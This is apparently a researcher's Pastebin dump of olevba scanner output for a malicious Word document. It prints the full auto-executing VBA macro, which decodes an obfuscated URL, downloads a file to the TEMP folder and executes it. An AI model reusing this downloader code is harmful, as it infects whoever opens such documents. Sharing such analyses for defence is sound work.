dynamoo

Malicious Word macro

Mar 4th, 2015
424
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Flags       Filename                                                        
  2. ----------- -----------------------------------------------------------------
  3. OLE:MAS---- document1.doc
  4.  
  5. (Flags: OpX=OpenXML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  6.  
  7. ===============================================================================
  8. FILE: document1.doc
  9. Type: OLE
  10. -------------------------------------------------------------------------------
  11. VBA MACRO ThisDocument.cls
  12. in file: document1.doc - OLE stream: u'Macros/VBA/ThisDocument'
  13. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  14. Sub autoopen()
  15. yQtUv56E4r
  16. End Sub
  17. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  18. ANALYSIS:
  19. +----------+----------+---------------------------------------+
  20. | Type     | Keyword  | Description                           |
  21. +----------+----------+---------------------------------------+
  22. | AutoExec | AutoOpen | Runs when the Word document is opened |
  23. +----------+----------+---------------------------------------+
  24. -------------------------------------------------------------------------------
  25. VBA MACRO Module1.bas
  26. in file: document1.doc - OLE stream: u'Macros/VBA/Module1'
  27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  28. #If VBA7 Then
  29.     Private Declare PtrSafe Function sdfsdfsdfsdf Lib "urlmon" Alias _
  30.     "URLDownloadToFileA" (ByVal fdgsdfFF As LongPtr, _
  31.     ByVal gfhgfhF As String, _
  32.     ByVal hjkhgFF As String, _
  33.     ByVal gfhfghF As Long, _
  34.     ByVal gfdgdf As LongPtr) As LongPtr
  35. #Else
  36.     Private Declare Function sdfsdfsdfsdf Lib "urlmon" Alias _
  37.     "URLDownloadToFileA" (ByVal fdgsdfFF As Long, _
  38.     ByVal gfhgfhF As String, _
  39.     ByVal hjkhgFF As String, _
  40.     ByVal gfhfghF As Long, _
  41.     ByVal gfdgdf As Long) As Long
  42. #End If
  43. Function ukQ2q73(o9Z_ As String, lb2tLi3yX9 As String) As Boolean
  44. vJHKBJdfkgfg = sdfsdfsdfsdf(0&, o9Z_, lb2tLi3yX9, 0&, 0&)
  45. Dim G32Q
  46. G32Q = Shell(lb2tLi3yX9, 1)
  47. End Function
  48.  
  49.  
  50.  
  51. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  52. ANALYSIS:
  53. +------------+--------------------+-----------------------------------------+
  54. | Type       | Keyword            | Description                             |
  55. +------------+--------------------+-----------------------------------------+
  56. | Suspicious | Lib                | May run code from a DLL                 |
  57. | Suspicious | Shell              | May run an executable file or a system  |
  58. |            |                    | command                                 |
  59. | Suspicious | URLDownloadToFileA | May download files from the Internet    |
  60. +------------+--------------------+-----------------------------------------+
  61. -------------------------------------------------------------------------------
  62. VBA MACRO Class1.cls
  63. in file: document1.doc - OLE stream: u'Macros/VBA/Class1'
  64. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  65. (empty macro)
  66. -------------------------------------------------------------------------------
  67. VBA MACRO Module2.bas
  68. in file: document1.doc - OLE stream: u'Macros/VBA/Module2'
  69. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  70.  
  71. Public Function wNLiDcUQctHeQbyt(TRQIOVnNMdSVNmP As String) As String
  72. GoTo GiChFYjYUOh
  73. GiChFYjYUOh:
  74. GoTo lvBxJabwyHfMp
  75. lvBxJabwyHfMp:
  76. For saOjZPeoQQJJ = 1 To Len(TRQIOVnNMdSVNmP) Step 2
  77. GoTo LTIokkjoZR
  78. LTIokkjoZR:
  79. GoTo ePgjmeCgKuqfzq
  80. ePgjmeCgKuqfzq:
  81. wNLiDcUQctHeQbyt = wNLiDcUQctHeQbyt & Mid(TRQIOVnNMdSVNmP, saOjZPeoQQJJ, 1)
  82. GoTo nnaMoKQlSkVaAo
  83. nnaMoKQlSkVaAo:
  84. GoTo xuRnLR
  85. xuRnLR:
  86. GoTo drMOY
  87. drMOY:
  88. Next
  89. GoTo VoIcVLrAAzEpipT
  90. VoIcVLrAAzEpipT:
  91. End Function
  92.  
  93. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  94. ANALYSIS:
  95. No suspicious keyword or IOC found.
  96. -------------------------------------------------------------------------------
  97. VBA MACRO Module3.bas
  98. in file: document1.doc - OLE stream: u'Macros/VBA/Module3'
  99. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  100. Sub yQtUv56E4r()
  101. ukQ2q73 wNLiDcUQctHeQbyt("h„tTtep}:O/u/Mr{e:tkr:oP-DmgoGtsoS.hcsbla‚.?p[lj/mjsI/?bwi{nU.be†x2e‚"), Environ(wNLiDcUQctHeQbyt("T8M}P-")) & wNLiDcUQctHeQbyt("\9G1HHjhk…d/j2fDgrjhk=G@KJ'.Le\xGe„")
  102. End Sub
  103. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  104. ANALYSIS:
  105. +------------+---------+---------------------------------------+
  106. | Type       | Keyword | Description                           |
  107. +------------+---------+---------------------------------------+
  108. | Suspicious | Environ | May read system environment variables |
  109. +------------+---------+---------------------------------------+
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×